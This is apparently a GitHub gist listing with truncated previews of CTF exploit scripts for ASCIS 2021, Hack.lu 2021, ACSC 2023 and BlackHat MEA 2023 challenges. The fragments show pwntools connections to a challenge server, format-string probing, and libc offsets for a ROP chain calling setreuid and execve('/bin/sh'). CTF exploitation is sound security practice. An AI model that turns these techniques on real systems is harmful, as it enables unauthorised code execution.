@kungfulon
kungfulon / exp.py
Created October 16, 2021 13:13
ASCIS 2021 Qualification Round - proxy
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
libc = ELF('./libc-2.31.so')
MY_IP = b''
r = remote('125.235.240.166', 20120)
@kungfulon
kungfulon / exp.py
Last active October 17, 2021 01:49
ASCIS 2021 Qualification Round - pwn2win
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
r = remote('125.235.240.166', 33333)
# 1st boss
r.sendline(b'%p')
@kungfulon
kungfulon / ex2.py
Last active October 19, 2021 02:05
ASCIS 2021 Qualification Round - image_converter
#!/usr/bin/env python3
import struct
import sys
libc = int(sys.argv[1], 16) - 0x270b3
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371
@kungfulon
kungfulon / exp.c
Created October 31, 2021 22:51
Hack.lu CTF 2021 Cloudinspect
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#define INFO "[*] "
@kungfulon
kungfulon / readme.md
Last active March 4, 2024 09:43
ACSC 2023 Write-up

Welcome

Discord flag.

Merkle Hellman

Brute force byte-by-byte and apply encrypt function to verify.

from pwn import *
@kungfulon
kungfulon / exp.py
Created November 16, 2023 06:03
BlackHat MEA 2023 - House of Minho
from pwn import *
context.update(os='linux', arch='amd64')
r = process('./minho')
l = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def new(size, data, abuse_scanf=0):
    r.sendlineafter(b'> ', b'1')
    r.sendlineafter(b': ', b'0' * abuse_scanf + str(size).encode())